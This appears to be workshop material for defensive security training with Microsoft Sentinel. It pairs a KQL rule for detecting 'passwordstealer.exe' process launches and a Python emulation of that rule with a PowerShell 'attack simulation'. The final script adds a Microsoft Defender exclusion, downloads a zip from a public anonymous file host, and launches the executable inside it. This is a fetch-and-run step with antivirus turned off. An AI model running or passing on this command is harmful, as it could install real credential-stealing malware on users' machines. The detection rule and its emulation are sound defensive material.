Welcome to the Defensive Cybersecurity Workshop, a hands-on cybersecurity workshop where students deploy their own cloud-based security infrastructure using Microsoft Azure and Microsoft Sentinel. This immersive experience lays the foundations for real-world blue team skills in detection, investigation, and response to modern cyber threats.
Below are the key snippets needed for the workshop.
Detection Rule (Slide 6.5)

```kql
// Sentinel analytics rule: process-creation events (4688) whose EventData mentions the sample.
// KQL `contains` is a case-insensitive substring match; use `contains_cs` for a case-sensitive one.
Event
| where EventID == 4688
| where EventData contains "passwordstealer.exe"
| project TimeGenerated, Computer, EventID, RenderedDescription
```
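To see exactly what the rule above matches before deploying it, the following Python block (an added example, not part of the workshop materials) emulates the KQL filter over a handful of constructed Event-table rows. The row layout mirrors the Sentinel `Event` table columns the rule projects; the EventData XML shape is assumed to follow the usual `<Data Name='NewProcessName'>` form. It also shows a tighter variant that keys on the created process's image name, so a command line that merely mentions the string does not fire.

```python
"""Added example: emulate the workshop's KQL detection rule over constructed 4688 events."""
import re
from dataclasses import dataclass


@dataclass
class EventRow:
    """One row of the Sentinel Event table (only the columns the rule touches)."""
    TimeGenerated: str
    Computer: str
    EventID: int
    EventData: str            # EventData XML stored as a string, shape assumed
    RenderedDescription: str


# Constructed sample rows; hostnames, times and paths are made up for the example.
SAMPLE_EVENTS = [
    EventRow("2024-05-01T10:00:00Z", "LAB-VM01", 4688,
             "<EventData><Data Name='NewProcessName'>C:\\Users\\lab\\AppData\\Local\\Temp"
             "\\passwordstealer_final\\passwordstealer.exe</Data></EventData>",
             "A new process has been created."),
    EventRow("2024-05-01T10:00:01Z", "LAB-VM01", 4688,
             "<EventData><Data Name='NewProcessName'>C:\\Windows\\System32\\notepad.exe"
             "</Data></EventData>",
             "A new process has been created."),
    # cmd.exe whose command line only mentions the name, in different case
    EventRow("2024-05-01T10:00:02Z", "LAB-VM01", 4688,
             "<EventData><Data Name='NewProcessName'>C:\\Windows\\System32\\cmd.exe</Data>"
             "<Data Name='CommandLine'>cmd /c echo PasswordStealer.EXE</Data></EventData>",
             "A new process has been created."),
    # process exit (4689) for the sample: not a creation event, rule must ignore it
    EventRow("2024-05-01T10:00:03Z", "LAB-VM01", 4689,
             "<EventData><Data Name='ProcessName'>C:\\Users\\lab\\AppData\\Local\\Temp"
             "\\passwordstealer_final\\passwordstealer.exe</Data></EventData>",
             "A process has exited."),
]


def kql_contains(haystack: str, needle: str) -> bool:
    """KQL `contains` is case-insensitive; Python's `in` is not, so fold case first."""
    return needle.casefold() in haystack.casefold()


def project(e: EventRow) -> dict:
    """The `project` clause: keep only the four columns the rule outputs."""
    return {"TimeGenerated": e.TimeGenerated, "Computer": e.Computer,
            "EventID": e.EventID, "RenderedDescription": e.RenderedDescription}


def detect_passwordstealer(events, needle: str = "passwordstealer.exe") -> list:
    """Equivalent of the workshop rule: EventID == 4688, then substring-match EventData."""
    return [project(e) for e in events
            if e.EventID == 4688 and kql_contains(e.EventData, needle)]


def new_process_name(event_data: str):
    """Pull NewProcessName out of the EventData XML (assumed layout)."""
    m = re.search(r"<Data Name='NewProcessName'>([^<]*)</Data>", event_data)
    return m.group(1) if m else None


def detect_by_image_name(events, image: str = "passwordstealer.exe") -> list:
    """Tighter variant: fire only when the created process's image name is the target,
    so a command line that merely contains the string does not match."""
    hits = []
    for e in events:
        if e.EventID != 4688:
            continue
        name = new_process_name(e.EventData)
        if name and name.casefold().rsplit("\\", 1)[-1] == image.casefold():
            hits.append(project(e))
    return hits


if __name__ == "__main__":
    for row in detect_passwordstealer(SAMPLE_EVENTS):
        print("contains-match:", row)
    for row in detect_by_image_name(SAMPLE_EVENTS):
        print("image-name-match:", row)
```

On the sample rows the substring rule returns two hits (the real launch and the cmd.exe row that merely echoes the name in different case), while the image-name variant returns only the launch; the 4689 exit event is dropped by both, as the `EventID == 4688` filter intends.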
```powershell
# Workshop attack simulation: fetch the lab's sample archive, exclude its folder from
# Microsoft Defender so the sample can execute, unpack it and launch it. This is what
# produces the 4688 event the detection rule above looks for.
# Add-MpPreference changes Defender settings, so run this in an elevated PowerShell session.
$zipUrl      = "https://files.catbox.moe/yjkxr7.zip"
$zipPath     = "$env:TEMP\passwordstealer.zip"
$extractPath = "$env:TEMP\passwordstealer_final"

Add-MpPreference -ExclusionPath $extractPath
Invoke-WebRequest -Uri $zipUrl -OutFile $zipPath
Expand-Archive -Path $zipPath -DestinationPath $extractPath -Force

Start-Process "$extractPath\passwordstealer.exe"
```